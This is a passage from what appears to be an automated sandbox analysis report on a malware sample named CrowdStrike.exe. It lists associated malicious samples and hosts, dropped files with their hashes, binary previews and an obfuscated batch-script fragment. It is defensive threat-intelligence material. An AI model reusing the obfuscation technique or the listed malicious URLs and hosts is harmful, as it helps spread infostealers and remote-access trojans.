 | ptKNiAaGus.exe | malicious | Unknown | icanhazip.com/
 | bJLd0SUHfj.exe | malicious | Unknown | icanhazip.com/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.telegram.org | ExFAhv0nes.exe | malicious | Unknown | 149.154.167.220
 | ExFAhv0nes.exe | malicious | Unknown | 149.154.167.220
 | cKt8r2v7Gy.exe | malicious | Unknown | 149.154.167.220
 | Final Shipping Documents.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | VERY GOOD.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
 | Order 8391-6.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
 | order 4500029722.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | Enquiry-Dubai.js | malicious | PXRECVOWEIWOEI Stealer | 149.154.167.220
 | 172131942401ffa05fff4c7d2b222e93d44117cc2a702a757a1aa7c5c6fc9cfeeacb380f89693.dat-decoded.exe | malicious | PXRECVOWEIWOEI Stealer | 149.154.167.220
 | 38dJrNR8hr.js | malicious | PXRECVOWEIWOEI Stealer | 149.154.167.220
icanhazip.com | PR240614_ORDER.exe | malicious | PXRECVOWEIWOEI Stealer | 104.16.185.241
 | Enquiry-Dubai.js | malicious | PXRECVOWEIWOEI Stealer | 104.16.184.241
 | 172131942401ffa05fff4c7d2b222e93d44117cc2a702a757a1aa7c5c6fc9cfeeacb380f89693.dat-decoded.exe | malicious | PXRECVOWEIWOEI Stealer | 104.16.185.241
 | 38dJrNR8hr.js | malicious | PXRECVOWEIWOEI Stealer | 104.16.185.241
 | Enquiry.ps1 | malicious | PXRECVOWEIWOEI Stealer | 104.16.184.241
 | CV.js | malicious | PXRECVOWEIWOEI Stealer | 104.16.184.241
 | CV.pdf | malicious | PXRECVOWEIWOEI Stealer | 104.16.184.241
 | CV.js | malicious | PXRECVOWEIWOEI Stealer | 104.16.185.241
 | pp.exe | malicious | PXRECVOWEIWOEI Stealer | 104.16.185.241
 | P.O.exe | malicious | PXRECVOWEIWOEI Stealer | 104.16.185.241
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | ExFAhv0nes.exe | malicious | Unknown | 149.154.167.220
 | ExFAhv0nes.exe | malicious | Unknown | 149.154.167.220
 | http://singaporepornvideossex.massagenow.my.id/ | malicious | Unknown | 149.154.167.99
 | file.exe | malicious | Vidar | 149.154.167.99
 | file.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, Stealc | 149.154.167.99
 | 9YDEsXvk5V.exe | malicious | Vidar | 149.154.167.99
 | https://telgramsignal1.sg-host.com/ | malicious | Unknown | 149.154.167.99
 | cKt8r2v7Gy.exe | malicious | Unknown | 149.154.167.220
 | Final Shipping Documents.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | VERY GOOD.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
CLOUDFLARENETUS | file.exe | malicious | Babadeda | 162.159.61.3
 | BE-0160-91904EI.exe | malicious | Unknown | 104.21.77.190
 | CB-3433-3048OTZ.exe | malicious | Unknown | 172.67.202.188
 | CFL-940-56382UY.exe | malicious | Unknown | 172.67.182.157
 | EHF-1677-6833RPE.exe | malicious | Unknown | 104.21.89.131
 | BON-1072-835CZB.exe | malicious | Unknown | 104.21.77.189
 | file.exe | malicious | Babadeda | 162.159.61.3
 | GAQ-527-3899XK.exe | malicious | Unknown | 172.67.211.43
 | HIZ-88372-7497BCP.exe | malicious | Unknown | 172.67.173.76
 | LRT-07219-94077CCQ.exe | malicious | Unknown | 104.21.67.238
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | dzCvoZ0uLj.exe | malicious | Quasar | 149.154.167.220
 | 0p8KrH1qfZ.exe | malicious | Quasar | 149.154.167.220
 | SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe | malicious | Unknown | 149.154.167.220
 | SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe | malicious | Unknown | 149.154.167.220
 | Mx0UGSI897.exe | malicious | DCRat | 149.154.167.220
 | https://xv-dna-idx-com.resmi-v1.biz.id/ | malicious | Unknown | 149.154.167.220
 | https://help-metaprotectextension.gitbook.io/ | malicious | Unknown | 149.154.167.220
 | https://bet3659981.com/ | malicious | Unknown | 149.154.167.220
 | http://madive-bunde-thinkkjhgf.pages.dev/help/contact/728719822901550/ | malicious | HTMLPhisher | 149.154.167.220
 | http://www.829347219502.com/ | malicious | Unknown | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\564784\Champion.pif | 9YDEsXvk5V.exe | malicious | Vidar
 | S9iJqTQS7q.exe | malicious | RedLine
 | bRlvBJEl6T.exe | malicious | Vidar
 | WINWORD.exe | malicious | NetWire
 | 7sYKxZWLgw.exe | malicious | PureLog Stealer
 | 7sYKxZWLgw.exe | malicious | Unknown
 | 55wj9QSq9c.exe | malicious | RedLine
 | 0dN59ZIkEM.exe | malicious | Vidar
 | file.exe | malicious | SmokeLoader
 | Celery.exe | malicious | PureLog Stealer, RedLine, zgRAT
C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | SecuriteInfo.com.Trojan.Siggen29.2381.17841.24795.exe | malicious | RedLine
 | oRALyHjeXB.exe | malicious | PureLog Stealer, RedLine, zgRAT
 | oRALyHjeXB.exe | malicious | PureLog Stealer, RedLine, zgRAT
 | UnDqKnghuz.exe | malicious | PureLog Stealer, RedLine, zgRAT
 | SecuriteInfo.com.Trojan.Inject5.5521.21793.4561.exe | malicious | XenoRAT
 | PURCHASE_ORDER.exe | malicious | XWorm
 | GaBpQuL0ie.exe | malicious | AsyncRAT
 | rRERFQ__________________.exe | malicious | XWorm
 | Bank Details.exe | malicious | Nanocore
 | 27062024_1338_ItsComedy.exe | malicious | AsyncRAT
                                                                      Process:C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1031
                                                                      Entropy (8bit):5.352154694194798
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLUE4Kx1qE4qpE4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MIHKx1qH2HKlYHKh3oPtHo6hAHKzeR
                                                                      MD5:9478992210AE74141FC3B9E7FCA5D80E
                                                                      SHA1:E7C0DF2C80FCE2322D5A7E3D7416965AE7355762
                                                                      SHA-256:E33633B8FBACDD8BE18B170500B6FF75F835233643EBC9FC2EAFCB5F3DBA335A
                                                                      SHA-512:F0149B6C0B7F47D740C902648642C229BD9B01D41BCDC66A4CA27124372A4789CFC0A7F2B5642BC203F8CAB9BDB277B6A1799E92A80471ECEDBB78E9921C808C
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):893608
                                                                      Entropy (8bit):6.620254876639106
                                                                      Encrypted:false
                                                                      SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                                      MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                      SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                                      SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                                      SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                                      Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 7%
• Antivirus: Virustotal, Detection: 3%
Joe Sandbox View:
• Filename: 9YDEsXvk5V.exe, Detection: malicious
• Filename: S9iJqTQS7q.exe, Detection: malicious
• Filename: bRlvBJEl6T.exe, Detection: malicious
• Filename: WINWORD.exe, Detection: malicious
• Filename: 7sYKxZWLgw.exe, Detection: malicious
• Filename: 7sYKxZWLgw.exe, Detection: malicious
• Filename: 55wj9QSq9c.exe, Detection: malicious
• Filename: 0dN59ZIkEM.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: Celery.exe, Detection: malicious
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):723951
                                                                      Entropy (8bit):7.999741137427432
                                                                      Encrypted:true
                                                                      SSDEEP:12288:G8aNy0WKYPp3DGqRm51F7QqkyCMQd58T94Ql9kO6yYdYg9+wymXfSw4hycjNc4AL:FaNhgDIL919kOaYgtyAqw4scjKu8
                                                                      MD5:FCA0910949D92DC3DD3DFCF0FB3D0408
                                                                      SHA1:9FC9B505FC882C1DFECBFC5DA33A9E083871BE95
                                                                      SHA-256:6F3428555B02970C6F0E0CD40E5D7296BD5CD6326A8CC197CA1AA9025091318B
                                                                      SHA-512:DC3E055390C4780318E8B7D98E48F8D74A8027399DB996F50805E088230B760E705188D1C301790B8E13EB70DE503C2B626ADB1C27FB746CE703BA15DB324DBC
                                                                      Malicious:false
                                                                      Preview:...b..G..@.`...i..nA.w...\....&....01.c.,..i.3.0^P.!.D.......,.G.....c=...a..8X.p...g..8F.l7..s..}hE...........w.....I+..!pa...jI....Tm...x......@f.....q...;8(.~..'%}@[...B?<.....*.k....9(~?..f...b...k..5...<....[..l.\!..s.B.`. xD*.>....?.@B..$S).[...@Z."e`D...L......[...Y..)..6..]|..Q.!..M..x~a.$....X...G....f.M./8....!..Pco..)(.....jX<.cn.tu..l......:e..:..M/.Y..-Mz..RM03$l9....T u.g..d..(.?...Oe....^S..2.....f#.9r8..a..)7.*...k.N._.".]g;......z....j.|4o)......F.../xPiiLh....(...zZ.+Q.DD_......&Ji.6...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....G.=.'.F...h.............v....oo.v....oo.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..|.T..,P..Myn.2..t.W....V.....
                                                                      Process:C:\Users\user\AppData\Local\Temp\564784\Champion.pif
                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):65440
                                                                      Entropy (8bit):6.049806962480652
                                                                      Encrypted:false
                                                                      SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                                      MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                                      SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                                      SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                                      SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                                      Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: SecuriteInfo.com.Trojan.Siggen29.2381.17841.24795.exe, Detection: malicious
• Filename: oRALyHjeXB.exe, Detection: malicious
• Filename: oRALyHjeXB.exe, Detection: malicious
• Filename: UnDqKnghuz.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.Inject5.5521.21793.4561.exe, Detection: malicious
• Filename: PURCHASE_ORDER.exe, Detection: malicious
• Filename: GaBpQuL0ie.exe, Detection: malicious
• Filename: rRERFQ__________________.exe, Detection: malicious
• Filename: Bank Details.exe, Detection: malicious
• Filename: 27062024_1338_ItsComedy.exe, Detection: malicious
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):51200
                                                                      Entropy (8bit):6.5020993529746125
                                                                      Encrypted:false
                                                                      SSDEEP:1536:3q5YdzhtD4RLGki26nWRgRPaM60w9/5SO:3qi/x4Rqf21Rgat0g/L
                                                                      MD5:B676C3573D166783AD23AEEC025D9788
                                                                      SHA1:D872CADEC97AD2BC5883793C8504C7EFFDA0E25C
                                                                      SHA-256:B09C0E4E65B615B4A957AB44E59ECCA0CA2A789AE22C8AF13C1B6846B0697E5E
                                                                      SHA-512:B3B0FAAD23213A9361F6DD90EA700D4C1372C07E1A8A5BF2D25CCBD21FD80745CED906BFBFCE2FCDADABFF76E65CCECBFD17501B27D28729DEAAC0F496E69989
                                                                      Malicious:false
                                                                      Preview:..k!....V...a!..;.v.V...U!....9r.v..B..H..s/...U.....3.;........z..v..B..H..Q/....3..E....tK...tF.M........Vj.j.S.0!........!/..P.M..(...F;.r.M..E.P......M...........+.E.@P......3..].Y;.s4.E.+.].]..E.Vj.j.S.. ............M..1F;.r..]..E..}........u......8......=...M...V..-..S....V....YY....j.j..H....pO.._^3.[..]...U.....e......E..E..E.SVW.@....E.....3.0...7+...F..E..E..@..p....!+...F..u..E.F.HH......HthHtSHt?H.......F..H...-...E....&.u....j+..!.3.@j..F.P...H.....N.......F..H..-..H.E.x.F..H..-...E..t..F..H..-.....x....~.3..u..E..u..u....p..u.S.0.:........].u.;^..u...u...*..3.@.&..F.....*..3.@.F..C..._^3.[..]...U..E.SVW.@..0....*...F..u...8.*...&.3.C.^....f..t"P.....Y..t.......f..u...f*...^..._^3.[]...U..E.SVW.@..0...)...F..u...8.4*...&.3.C.^....f..t"P....I...t.......f..u....*...^..._^3.[]...U..E.SVW.@..0...Z)...F..u...8..)...&.3.C.^....f..t"P....I...t.......f..u...)...^..._^3.[]...U..E.SVW.@..0....(...F..u...8.t)...&.3.C.^....f..t"P.....Y..t.......f..u
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):60416
                                                                      Entropy (8bit):6.60583328733246
                                                                      Encrypted:false
                                                                      SSDEEP:1536:9Q6JP04vDcmrIEVJRa5oQyyk4qt1FqnLUshVkf88nfNk4qqdGYynh:9Q4NvoWV7a5ouYNqnLzAfaBaGj
                                                                      MD5:390569AF71570B823EED8C4D63733AF8
                                                                      SHA1:1D6F23F8ABB11203661F6CA59A6D3EEC975EAB32
                                                                      SHA-256:023A48297F82FDB98E70645FCA8703C1E0CC04835B166652CB155EC4850506B5
                                                                      SHA-512:80A7BA548DD1378E975D32CB5D6B6B54C3E47B8A292CD8FBEDAB1886A53360E8865423CC78664E8860D792D58A5C5758966C364DE1C03517D526A5FB0C14D5BC
                                                                      Malicious:false
                                                                      Preview:...j..M.......F...l.~........j..M.......F........~........j[.M.......F...5.~........j[.M......F.......~........j\.M......F...E..P..........~........j\.M..a....F...u.~ .t.j.S...b....n.~..u.j..M..9....E..P.u...3..W.M.....f9.t'W.M......M...0...P......E..P....G..8^.u.j..M.......E..P.]....M.......M......_^[..].......F...F...F...F.M.F.j.F...F...F...F...F.3.F.f.F.-.F...F...F.U....VW.}....~GS.M..`....u..b...3...E.f.E..E.P......^...S......E..P.....Ou.S.......[_^..]...U..Q.E.SW...W.M.....I.f....8].t@V.5..I.Qj.j.W..M.P.u.. ....M..?...Qj.j.W..M.P.u.......M......^_..[..]...U... ...SVW.}...~ ........G..]..}.....................................t~......P....I...t.................P....I................<.u........~..u..~..u....u..~..u..~..u...... ...RPh......R...Ph......j.Ph.....v ....I..P...t!...a...Q..<.u.j...j..u..u.......*f.E.3.j..E..E.....B3.!M.!M.PR.U.f.M.....I........_^[..]...U... ...SVW.}...~ ........G..]..}.................................................P....I...t....
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):15360
                                                                      Entropy (8bit):6.592759647081098
                                                                      Encrypted:false
                                                                      SSDEEP:384:Xk/3fNJH03ApHUYk1dx59ib+Pk8cdPptJ:XEp0wpk1dxvhc8cdPpn
                                                                      MD5:A46346EB86D98CCB81A8743DC0C6C111
                                                                      SHA1:45FCA7577D328D0431E5D3B608019FEF24EE8303
                                                                      SHA-256:3C63D2E589E41C927D02F9BB0E983F1C2AD8BDDF417C1DA6DD9B5B3979EA1E97
                                                                      SHA-512:D093FCF0552AE6F2A04660A9EEBD4A3536307A545412AE796E1067F8A3D466BC8B738F9ACFFDB8DFA3730980BF62E2DAAD1C06AB9A6F789F19BE3AF0017D0C46
                                                                      Malicious:false
                                                                      Preview:.E.P.I..E...........M.............pe...O..e...E..E.P.I..E..........M..........O.u..E....P........'....A....O....E.A..E.A..E..A..M.E......E.A..E.A..E.A..E......t..M....x......t..M..k...3..E..I..E.].P.]..].]..]..E.......|.I.j.X.]..].f.E.}...W.P..E..].P.M.]..E..........M.......M.E.P.E..L..._...Q.E.....L..PQS.E...P.E.P.E.P.....u.Q.E.PQj..E...P.E.P.E.P.....S.u..H....'....E....L.P..\.I..M..]..].....M......M..z~..3._^[..]...U.......SV..M.W.]..s....T....s....d....s..j.3..}.Y3..u..}....1....M...D...V.G......7....Y..y.VVVP...:....]..U..M.j.XS.u.f.E...D...P.#................VVVj.j.VVj.V..p.I.j..E.VP......M..U........9u........u..M..E.......x..hL,I..M..........u..E.E..E..u..u......}.;}.v..E..E...t....r...u..E.VP..t.....t....t...P..T.....}....t.....}....T....M.E...X....E..G.j.P..t...P.Y...P..d.....|....t.....|....d....E...h....E...t.S.]..3...Y.E....u..u..E..E.....j..E.E.[.]..u.u..E......u.E...j..u.[j..E.u.VP.....E.....E..E..E..;I..u.Pj..E.Pj.V..D...P..|.I.
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):43008
                                                                      Entropy (8bit):3.2720068663221333
                                                                      Encrypted:false
                                                                      SSDEEP:384:aMOUyM0pNDj21naB3pMygarucTQ0yrJcLH03LfTN319stEjFKr+/hdv:JyM0Dj2Bmgari07LULTN3Efr8
                                                                      MD5:A001542705E46D08B5B2D97CD0706599
                                                                      SHA1:0D21AC40BA775FF7E99F2162B3FDC68A21989C54
                                                                      SHA-256:EE55F2498F769CBAF5E60C7E3E28A93BEEE507083920CF9D18C9CA9043409E56
                                                                      SHA-512:6E0056246B26EB04305C6D6805D6DDBA5F1422B01C6686E798E9752166A66402B088338AB7F243933A04AF4ADADC82040E9B5E0C374FCA214B25B725D46B4924
                                                                      Malicious:false
                                                                      Preview:onnectionW....WNetCancelConnection2W..$.WNetGetConnectionW..MPR.dll.k.InternetCloseHandle...InternetOpenW...InternetSetOptionW..t.InternetCrackUrlW.Z.HttpQueryInfoW....InternetQueryOptionW..r.InternetConnectW..X.HttpOpenRequestW..^.HttpSendRequestW..5.FtpOpenFileW..2.FtpGetFileSize....InternetOpenUrlW....InternetReadFile....InternetQueryDataAvailable..WININET.dll...GetProcessMemoryInfo..PSAPI.DLL...IcmpCreateFile....IcmpSendEcho....IcmpCloseHandle.IPHLPAPI.DLL..!.LoadUserProfileW....CreateEnvironmentBlock..,.UnloadUserProfile...DestroyEnvironmentBlock.USERENV.dll.?.IsThemeActive.UxTheme.dll...InterlockedIncrement....InterlockedDecrement....DeleteCriticalSection...InitializeCriticalSectionAndSpinCount...RaiseException....GetLastError....DecodePointer.E.lstrcmpiW...GetCurrentDirectoryW....IsDebuggerPresent.M.SetCurrentDirectoryW....GetFullPathNameW..R.CloseHandle...GetCurrentThread....GetCurrentProcess...DuplicateHandle...CreateThread....WaitForSingleObject...HeapAlloc.J.GetProcessHeap..
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:ASCII text, with very long lines (487), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):11022
                                                                      Entropy (8bit):5.064954901119974
                                                                      Encrypted:false
                                                                      SSDEEP:192:IVoa0yXniz7UxtaUxtQNzdiMwvN6RjprpSdYfDmggGX/xAqqL4vFBPVXKECjtp:IofEYUx1xcXFNproK7mgvTqL4vFB9Xfk
                                                                      MD5:9FAB9F640DB1F75FB8C18BFB50976ABD
                                                                      SHA1:FC30BC2230E48EE0FAEC0B1C00D635DDAC4D37B2
                                                                      SHA-256:1FA1F7F0089F89E07406412C257AE546BB9728F7055F804E800E6C41A682C882
                                                                      SHA-512:313260AE98EDBE39F21BBCBF86182E513BC658B4C48AB11AF507E5C6FA5FAE3FD9CFE6999D4ED72AF78BE5FF8FCFCA7820DD6D8A146E153588F6015F04F25CE3
                                                                      Malicious:false
                                                                      Preview:Set Walker=z..VhQTPunch Representations Silver Prayers Sim Leslie Browser Laptops Surrounding ..eJuODoom Sans En Halo England Buys Chargers Yemen ..eEmCt Wine Gonna Warned Hay Sold ..lzuArch Pocket Kenny Helmet Gov Plain Childhood Belarus ..oLWarner Hired ..Set Mirrors=W..NiHAdults Legacy Drives ..CrgfPressing Therapeutic ..baGReflect Northeast Yesterday Territories Know Equipment ..mScSporting Worcester Bend Illustrated Cutting ..GwoLogical Star ..TOeSources Itunes Logged Aurora Urban ..QiRequires Rehab ..rOwuHuge Excluded Annie Developmental Plane ..QdHoney Corporations Revenge Guarantees Accomplished ..hYIxJoel Through Samuel Distribute Effort Available Reject Tc Explore ..Set Bl=B..LrbAdverse Cutting Claims Even Protected ..nOFxRenewable Alcohol Inserted Bookings Bull Pass Damage ..BCVoid Newscom Highest Unlikely Xi Franklin Z ..wdChRefrigerator Lambda Aviation ..McPenguin Tile Estimated Yale Strip Surprising Xi Entity Sticker ..wVVDistant Mild Thirty ..NyOUHttp Confirmed Runs Crow
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:ASCII text, with very long lines (487), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):11022
                                                                      Entropy (8bit):5.064954901119974
                                                                      Encrypted:false
                                                                      SSDEEP:192:IVoa0yXniz7UxtaUxtQNzdiMwvN6RjprpSdYfDmggGX/xAqqL4vFBPVXKECjtp:IofEYUx1xcXFNproK7mgvTqL4vFB9Xfk
                                                                      MD5:9FAB9F640DB1F75FB8C18BFB50976ABD
                                                                      SHA1:FC30BC2230E48EE0FAEC0B1C00D635DDAC4D37B2
                                                                      SHA-256:1FA1F7F0089F89E07406412C257AE546BB9728F7055F804E800E6C41A682C882
                                                                      SHA-512:313260AE98EDBE39F21BBCBF86182E513BC658B4C48AB11AF507E5C6FA5FAE3FD9CFE6999D4ED72AF78BE5FF8FCFCA7820DD6D8A146E153588F6015F04F25CE3
                                                                      Malicious:false
                                                                      Preview:Set Walker=z..VhQTPunch Representations Silver Prayers Sim Leslie Browser Laptops Surrounding ..eJuODoom Sans En Halo England Buys Chargers Yemen ..eEmCt Wine Gonna Warned Hay Sold ..lzuArch Pocket Kenny Helmet Gov Plain Childhood Belarus ..oLWarner Hired ..Set Mirrors=W..NiHAdults Legacy Drives ..CrgfPressing Therapeutic ..baGReflect Northeast Yesterday Territories Know Equipment ..mScSporting Worcester Bend Illustrated Cutting ..GwoLogical Star ..TOeSources Itunes Logged Aurora Urban ..QiRequires Rehab ..rOwuHuge Excluded Annie Developmental Plane ..QdHoney Corporations Revenge Guarantees Accomplished ..hYIxJoel Through Samuel Distribute Effort Available Reject Tc Explore ..Set Bl=B..LrbAdverse Cutting Claims Even Protected ..nOFxRenewable Alcohol Inserted Bookings Bull Pass Damage ..BCVoid Newscom Highest Unlikely Xi Franklin Z ..wdChRefrigerator Lambda Aviation ..McPenguin Tile Estimated Yale Strip Surprising Xi Entity Sticker ..wVVDistant Mild Thirty ..NyOUHttp Confirmed Runs Crow
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):17408
                                                                      Entropy (8bit):6.656096109477255
                                                                      Encrypted:false
                                                                      SSDEEP:384:epx324JcpLYvgveO/qhyTcPBcV+5D5eXc7/ZKhAQ:epx5cpiU7GEXc7/ZKhr
                                                                      MD5:19E98CBB75F1B8BD8EFDE5FE0ABD34B2
                                                                      SHA1:DA7A1A41FEDEDB49D33FCCEF4E55C931EDD89A88
                                                                      SHA-256:DF0CB092CD377DF6571BB86BB48E586E1A5012EDBE1C8A180DE8BE3FAE080356
                                                                      SHA-512:F412D89E162CE658780748BEB8BD6D7021D0F9690BAC2722C29794BFE74C227C3F25D1A6DB3E778C0D03BE24427C3FCD375B73082678109EC462243B4CA422FA
                                                                      Malicious:false
                                                                      Preview:....E..~..~..F..E..N$...I.......t..v$.vT..E.P..D.I.P....I..M......F.@t..E.+E.+E.+.......M..F...}.t..E.+.+E.+....j.W.u.SQ.vT....I..E.P.vT..4.I..M.......E.+E....+E..E.Pj.j..vT....I....^......z".F....[J.j.....Ph.....vT....I..FX_3.^@[..].U.......V..h.....vT....I...tah..........QP..l.I..F..t.f.......u.j.....I..4...^......z.h.....vT....I.......P.N4.1J..j..vT....I.^..].U....VW3...}........Sj..vT....I..E...ti.M.QP....I..}..M.;.~......}..M..].U.;.~.....].U.+.+.}.j.RQ+....Wj.X+..+..E.j.[.......Q.u.....I.j..vT....I..E...t_.M.QP....I..]..M.;.~.....]..M..U..E.;.~..U..E.U.+.+.j.RQ.A..+..kE..Wj.[.....+.P.u.....I.h.....vT....I....tN.E.PS....I..M..E.;.~..E..M..U.M.;.~.....U.M.j.X+.+.j....E.Q...PWj.S....I.h.....vT....I.[..t.j..O.Q.M....Qj.j.P....I.j.j..vT..X.I._^..]...U..}.....V..u.h..I..N4.`H..j..vT....I.^]...U..=..L..u.3.]...].....U..Q.E.....L....ti...tQ-....t5Ht.HHu..u........a.E....Ht.Ht.3..T...I....H...B....?.zT.u..E..BT...H....-.E..@......@.r......M......P.....
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):21504
                                                                      Entropy (8bit):6.7544955314562225
                                                                      Encrypted:false
                                                                      SSDEEP:384:4orFzz4ep4r3ecejLC3x1tMfPM8U6awhLVrg/drYEAmgPph1nE:4oxQeU3ecejLixwghYEYP3O
                                                                      MD5:1E7FD6E5143B761B91DCF7B0321EFC3C
                                                                      SHA1:4F18054452E2A1F2E1041CA162E1342A1BAB9B01
                                                                      SHA-256:D2E56ECCBE919716F7E2A961290E740DA9719893F57E2E70D0E59971B5910889
                                                                      SHA-512:26EB77C4532CF53CA3F5F1A74683D8010AC73BA9657DC03BD82F4F379EC228E0FEC56263E8522B7AD1879A8AC7610CBD091A2DBFA5D3A124DCB05C6309A6177F
                                                                      Malicious:false
